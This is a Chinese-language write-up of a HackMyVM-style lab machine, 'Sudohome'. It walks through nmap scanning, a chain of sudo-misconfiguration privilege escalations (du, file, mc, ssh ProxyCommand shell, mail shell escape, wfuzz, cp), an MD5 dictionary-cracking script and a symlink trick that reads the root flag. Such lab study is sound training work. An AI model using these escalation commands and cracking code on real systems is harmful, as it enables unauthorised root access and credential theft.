群友靶机Sudohome复现
Sudohome
nmap -p- 192.168.5.91
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-04 12:11 EST
Nmap scan report for zero.hmv (192.168.5.91)
Host is up (0.00033s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
MAC Address: 08:00:27:3A:DD:4C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
80端口仅提示ssh。尝试ssh,发现给出了user1的账密,直接登。
sudo -l看一下,大概是要不断横向。
1->2(du)
sudo -l
Matching Defaults entries for user1 on SudoHome:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User user1 may run the following commands on SudoHome:
(user2) NOPASSWD: /usr/bin/du
看一下du命令参数du --help同时发现user2目录下存在密码文件,大概是要du读取密码获得user2权限。注意到--files0-from=F可以从文件F中读取以NULL分隔的文件名列表,password.txt作为F,通过报错输出密码。
sudo -u user2 du --files0-from=/home/user2/password.txt
du: cannot access 'tLPi3BLMG2zmwvZ5z9rh'$'\n': No such file or directory
2->3(file)
可以免密执行file参数,这个之前群友出过 -f参数可以按行读取进行解析。
sudo -u user3 file -f /home/user3/password.txt
TFqxDyfGO69DP1lyjt0f: cannot open `TFqxDyfGO69DP1lyjt0f' (No such file or directory)
3->4 (mc)
可以免密执行mc参数,注意到 -U, --subshell Enables subshell support (default)可以开启4身份的交互窗口。
读取到密码B0aWh2XHpp5hOIVtCUbn
4->5(ssh)
可以免密执行ssh。gtfobins现成的
user4@SudoHome:~$ sudo -u user5 ssh -o ProxyCommand=';sh 0<&2 1>&2' x
$ cat /home/user5/password.txt
GZ5KErjFycaYHZGj7GcI
5->6(rev)
和直接给你cat命令没啥区别了。
sudo -u user6 rev /home/user6/password.txt
LowGbJGVAxhQw63UWc5Z
再reverse一遍即可。
6->7(cp)
可以免密执行cp命令。把密码复制到一个可读文件中即可。
sudo -u user7 cp /home/user7/password.txt /home/user7/.profile
7->8(mail)
使用现成的,但是不支持--exec参数。
user7@SudoHome:~$ sudo -u user8 mail -f /home/user8/password.txt
Mail version 8.1.2 01/15/2001. Type ? for help.
"/home/user8/password.txt": 0 messages
& !/bin/bash
user8@SudoHome:/home/user7$ id
uid=1007(user8) gid=1007(user8) groups=1007(user8)
8->9(wfuzz)
直接把password当字典用。
sudo -u user9 wfuzz -w /home/user9/password.txt -u "http://127.0.0.1/FUZZ"
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://127.0.0.1/FUZZ
Total requests: 1
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 404 9 L 31 W 271 Ch "peqkSBCDKvVxxNwcq1j4"
Total time: 0
Processed Requests: 1
Filtered Requests: 0
Requests/sec.: 0
9->10(md5sum)
大概是要进行密码爆破。
发现是13字节,可能是12位密码+换行符。
ai搞个脚本即可。
#!/usr/bin/env python3
import hashlib
import sys
def md5_crack(target_hash, dictionary_path):
"""
MD5 Password Recovery Script
For educational and legitimate security testing purposes only
Args:
target_hash (str): Target MD5 hash to crack
dictionary_path (str): Path to wordlist file
"""
try:
with open(dictionary_path, 'r', encoding='utf-8', errors='ignore') as file:
for line_num, password in enumerate(file, 1):
password = password.strip() # Remove newline and whitespace
# Hash calculation: password + newline character
test_string = password + '\n'
calculated_hash = hashlib.md5(test_string.encode('utf-8')).hexdigest()
if calculated_hash == target_hash:
print(f"\n[SUCCESS] Password found: '{password}'")
print(f"Line number: {line_num}")
print(f"Hash verification: {calculated_hash}")
return password
# Progress indicator
if line_num % 100000 == 0:
print(f"Attempted {line_num:,} passwords...")
except FileNotFoundError:
print(f"[ERROR] Dictionary file not found: {dictionary_path}")
return None
except KeyboardInterrupt:
print(f"\n[INTERRUPTED] Stopped at line {line_num}")
return None
print(f"\n[COMPLETE] Password not found in dictionary")
return None
def main():
# Target configuration
target_hash = "65e31d336be184593812c18533fa4fa2"
dictionary_path = "/usr/share/wordlists/rockyou.txt"
print("=== MD5 Password Recovery Tool ===")
print(f"Target Hash: {target_hash}")
print(f"Dictionary: {dictionary_path}")
print("Hash format: MD5(password + '\\n')")
print("-" * 40)
# Check if dictionary file exists
import os
if not os.path.exists(dictionary_path):
print(f"[ERROR] Dictionary file not found: {dictionary_path}")
print("Common locations:")
print(" - /usr/share/wordlists/rockyou.txt")
print(" - /usr/share/wordlists/rockyou.txt.gz (need to decompress)")
print(" - ./rockyou.txt")
sys.exit(1)
# Start cracking
result = md5_crack(target_hash, dictionary_path)
if result:
print(f"\n[RESULT] Recovered password: {result}")
else:
print("\n[RESULT] Password recovery failed")
if __name__ == "__main__":
main()
拿到密码
python3 md5recov.py
=== MD5 Password Recovery Tool ===
Target Hash: 65e31d336be184593812c18533fa4fa2
Dictionary: /usr/share/wordlists/rockyou.txt
Hash format: MD5(password + '\n')
----------------------------------------
Attempted 100,000 passwords...
Attempted 200,000 passwords...
Attempted 300,000 passwords...
Attempted 400,000 passwords...
[SUCCESS] Password found: 'morrinsville'
Line number: 400474
Hash verification: 65e31d336be184593812c18533fa4fa2
[RESULT] Recovered password: morrinsville
user10->root
user10@SudoHome:~$ sudo -l
Matching Defaults entries for user10 on SudoHome:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User user10 may run the following commands on SudoHome:
(ALL) NOPASSWD: /usr/bin/cat /home/user10/.important
无法查看到root目录下文件,通过软链接(快捷方式)到.important文件,进行查看。
user10@SudoHome:~$ rm .important
rm: remove write-protected regular file '.important'? y
user10@SudoHome:~$ ln -s /root/root.txt .important
user10@SudoHome:~$ sudo /usr/bin/cat /home/user10/.important
flag{root-f522d1d715970073a6413474ca0e0f63}
提权labs了属于是,学到很多。
艰难困苦,玉汝于成
浙公网安备 33010602011771号